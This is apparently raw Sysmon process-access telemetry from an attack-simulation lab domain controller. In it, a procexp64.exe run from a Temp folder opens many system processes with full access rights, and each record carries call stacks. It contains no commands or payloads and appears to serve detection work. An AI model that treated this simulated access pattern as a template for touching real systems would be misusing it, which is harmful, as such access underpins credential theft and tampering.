15:16:04.549{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0A00-00000000A301}848C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786423Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:04.549{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786422Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:04.549{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0800-00000000A301}720C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786421Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:04.549{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0700-00000000A301}712C:\Windows\system32\wininit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786420Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:04.549{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1517-600B-0500-00000000A301}640C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786419Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:04.549{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0200-00000000A301}448C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786418Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:04.549{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0100-00000000A301}4System0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786773Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.627{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C7A2-00000000A301}7020C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+4e7ac|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+50417|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a22bb|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786772Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.627{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C7A2-00000000A301}7020C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+77951|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+77a03|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+1b2ca|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+1b1c9|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+6e587|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a22a8|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786771Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.627{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C7A2-00000000A301}7020C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a210b|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786770Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.627{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C7A2-00000000A301}7020C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\winsta.dll+1178|C:\Windows\SYSTEM32\winsta.dll+10b5|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+9d7f4|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a17fa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786769Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.627{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C7A2-00000000A301}7020C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a165c|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786768Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.627{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C6A2-00000000A301}5144C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+4e7ac|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+50417|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a22bb|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786767Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.627{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C6A2-00000000A301}5144C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x101450C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+1b31a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+1b1c9|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+6e587|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a22a8|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786766Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.627{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C6A2-00000000A301}5144C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+cbf3f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+cc19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+cc305|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+77ae5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+1b2ca|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+1b1c9|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+6e587|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a22a8|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786765Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.627{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C6A2-00000000A301}5144C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+77951|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+77a03|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+1b2ca|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+1b1c9|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+6e587|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a22a8|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786764Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.627{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C6A2-00000000A301}5144C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a210b|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786763Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.611{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C6A2-00000000A301}5144C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\winsta.dll+1178|C:\Windows\SYSTEM32\winsta.dll+10b5|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+9d7f4|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a17fa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786762Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.611{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C6A2-00000000A301}5144C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a165c|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786761Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.611{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C5A2-00000000A301}5220C:\Windows\System32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+4e7ac|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+50417|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a22bb|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786760Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.611{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C5A2-00000000A301}5220C:\Windows\System32\mshta.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+77951|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+77a03|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+1b2ca|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+1b1c9|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+6e587|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a22a8|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786759Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.611{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C5A2-00000000A301}5220C:\Windows\System32\mshta.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a210b|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786758Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.611{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C5A2-00000000A301}5220C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\winsta.dll+1178|C:\Windows\SYSTEM32\winsta.dll+10b5|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+9d7f4|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a17fa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786757Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.611{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C5A2-00000000A301}5220C:\Windows\System32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a165c|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786756Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.611{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+4e7ac|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+50417|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a22bb|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786755Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.611{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+77951|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+77a03|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+1b2ca|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+1b1c9|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+6e587|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a22a8|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786754Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.611{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a210b|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786753Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.596{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\winsta.dll+1178|C:\Windows\SYSTEM32\winsta.dll+10b5|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+9d7f4|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a17fa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786752Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.596{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a165c|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786751Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.596{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786750Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.596{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786749Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.596{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786748Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 